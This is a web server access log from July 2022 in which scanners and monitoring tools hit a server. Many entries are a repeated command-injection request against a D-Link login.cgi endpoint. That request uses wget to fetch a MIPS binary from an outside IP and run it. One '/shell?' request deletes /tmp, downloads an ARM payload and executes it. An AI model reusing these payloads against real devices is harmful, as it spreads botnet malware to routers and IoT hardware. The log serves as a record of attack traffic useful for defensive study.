60.30.98.94 - - [04/Jul/2022:11:12:04 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
193.201.9.157 - - [04/Jul/2022:11:12:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:12:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
115.56.229.70 - - [04/Jul/2022:11:15:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
42.82.222.21 - - [04/Jul/2022:11:15:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.6.146.117 - - [04/Jul/2022:11:17:08 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:17:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
189.166.76.233 - - [04/Jul/2022:11:18:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
64.62.197.77 - - [04/Jul/2022:11:18:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2022:11:18:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.227 - - [04/Jul/2022:11:19:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2022:11:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.119.29.116 - - [04/Jul/2022:11:19:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:20:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:20:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:21:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:21:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:21:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:21:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:22:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.125.185.80 - - [04/Jul/2022:11:23:15 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.239.4.70 - - [04/Jul/2022:11:24:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
104.32.129.162 - - [04/Jul/2022:11:25:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:25:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
121.16.232.89 - - [04/Jul/2022:11:25:21 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
167.248.133.119 - - [04/Jul/2022:11:26:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.119 - - [04/Jul/2022:11:26:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.119 - - [04/Jul/2022:11:26:05 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [04/Jul/2022:11:26:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:27:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:28:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.30.235.170 - - [04/Jul/2022:11:28:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
47.195.227.98 - - [04/Jul/2022:11:28:51 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:29:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:29:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
171.118.154.104 - - [04/Jul/2022:11:29:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
94.102.61.10 - - [04/Jul/2022:11:30:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [04/Jul/2022:11:30:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.174.30 - - [04/Jul/2022:11:30:56 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [04/Jul/2022:11:31:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.140.95.148 - - [04/Jul/2022:11:31:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:32:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.32.129.162 - - [04/Jul/2022:11:32:45 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
115.86.164.63 - - [04/Jul/2022:11:33:00 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
124.128.187.128 - - [04/Jul/2022:11:33:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:35:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:35:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:35:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:35:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
94.102.61.10 - - [04/Jul/2022:11:35:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [04/Jul/2022:11:36:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:37:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:37:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.6.1.64 - - [04/Jul/2022:11:37:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
193.201.9.157 - - [04/Jul/2022:11:37:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
222.133.54.222 - - [04/Jul/2022:11:37:47 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:38:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [04/Jul/2022:11:39:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [04/Jul/2022:11:39:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:39:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:40:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [04/Jul/2022:11:40:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [04/Jul/2022:11:41:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:42:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:42:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:43:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.79.159.13 - - [04/Jul/2022:11:43:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [04/Jul/2022:11:44:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
124.128.187.128 - - [04/Jul/2022:11:45:09 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:45:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [04/Jul/2022:11:45:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
193.201.9.157 - - [04/Jul/2022:11:45:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:45:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:45:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:46:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [04/Jul/2022:11:46:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [04/Jul/2022:11:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.174.30 - - [04/Jul/2022:11:47:55 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [04/Jul/2022:11:48:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
223.130.30.88 - - [04/Jul/2022:11:48:21 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 324 "-" "-"
193.201.9.157 - - [04/Jul/2022:11:49:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:49:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:49:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
124.128.187.128 - - [04/Jul/2022:11:49:56 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [04/Jul/2022:11:51:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [04/Jul/2022:11:52:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [04/Jul/2022:11:52:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [04/Jul/2022:11:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.0.109.103 - - [04/Jul/2022:11:53:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:54:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:54:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:54:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:54:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:54:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:54:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
125.43.186.44 - - [04/Jul/2022:11:55:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:55:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.6.1.64 - - [04/Jul/2022:11:56:15 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:56:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.92.139.2 - - [04/Jul/2022:11:56:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [04/Jul/2022:11:57:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:58:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
171.118.154.104 - - [04/Jul/2022:11:58:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
60.7.40.221 - - [04/Jul/2022:11:59:17 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:59:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:59:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:12:00:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
121.21.163.78 - - [04/Jul/2022:12:00:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:12:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
108.46.133.120 - - [04/Jul/2022:12:02:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:12:02:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:03:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:12:03:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:12:04:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:05:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:12:05:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:12:05:41 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:12:06:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.6.146.117 - - [04/Jul/2022:12:07:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
193.201.9.157 - - [04/Jul/2022:12:07:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:12:07:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.116.220.93 - - [04/Jul/2022:12:07:43 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
171.118.154.104 - - [04/Jul/2022:12:07:54 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:12:08:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:09:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:12:09:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:12:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:12:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:12:12:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
45.164.20.161 - - [04/Jul/2022:12:13:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 91.218.67.131/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [04/Jul/2022:12:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.7.40.221 - - [04/Jul/2022:12:13:18 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
59.24.82.252 - - [04/Jul/2022:12:13:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
104.175.39.48 - - [04/Jul/2022:12:14:01 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
